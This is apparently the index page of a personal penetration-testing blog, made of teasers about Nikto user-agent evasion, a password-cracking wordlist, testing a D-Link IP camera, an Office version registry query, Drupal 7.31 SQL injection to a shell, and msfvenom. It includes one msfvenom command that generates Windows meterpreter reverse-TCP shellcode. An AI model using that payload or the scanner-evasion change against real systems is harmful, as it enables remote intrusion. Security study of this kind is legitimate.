Nikto is a great tool for scanning web servers for vulnerabilities but if you look at the logs, you can see its footprint:

"Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:Port Check)"

...which makes it simple to block. To change Nikto's user agent, we open the configuration file found in /etc/nikto.conf

Read more: Nikto User Agent Change

I have a wordlist I created from a collection of wordlists I've acquired.  It's not the end-all, be-all wordlist but it's a big and if you have a weak password, it's in this list.  In fact, if you have a decent password, it's in the list.

It's a good list for banging against passwords to see if they are reasonably secure.  When I attempt to crack a passwords, I go to the top 10 most used, the top 500 most used, and then 'the' list.  Beyond that, I'm probably going to stop unless I have a different motivation.

Read more: Cewl -- Building Wordlists

With the recent talk about hijacking IP cameras for the purposes of creating a bot army, I decided to order a camera.   I'd seen this model or one like it in my local lunch place and I ordered one from Amazon.  Two days later, I got my target, a "D-Link DCS-930L Wi-Fi Camera with Remote Viewing".  Nothing fancy really.  Just a $30 camera that can be used wired or wirelessly, but apparently only good for "day use".  It will serve my purpose though.  Army of one.

Read more: Internet of Things -- D-Link DCS-930L

I needed to quickly gather the version of Microsoft Office in a mixed version environment.  Simple enough, let's grab the version of Word:

reg query "HKEY_CLASSES_ROOT\Word.Application\CurVer"

Read more: Command Line -- Microsoft Office Version

There’s a certain feeling of satisfaction when you can manually work your way through exploiting a box.  Not only that, you’ll have a better understanding of what’s really going on under the hood.  You don’t really get that when you’re using automated tools.  Not that I don’t use what’s in the toolbox but given the choice, I will try the manual route first.

I've not seen much of Drupal from either side but I found myself staring at a 7.31 installation and after some quick searches, I realized it was vulnerable to SQL injection.

Read more: Drupal to Low Priv Shell

I wanted to generate some shell code for an exploit and I used the following command:

msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -f js_le -b "\x00\x0a\x0d"

Read more: msfvenom -- Specific Byte Count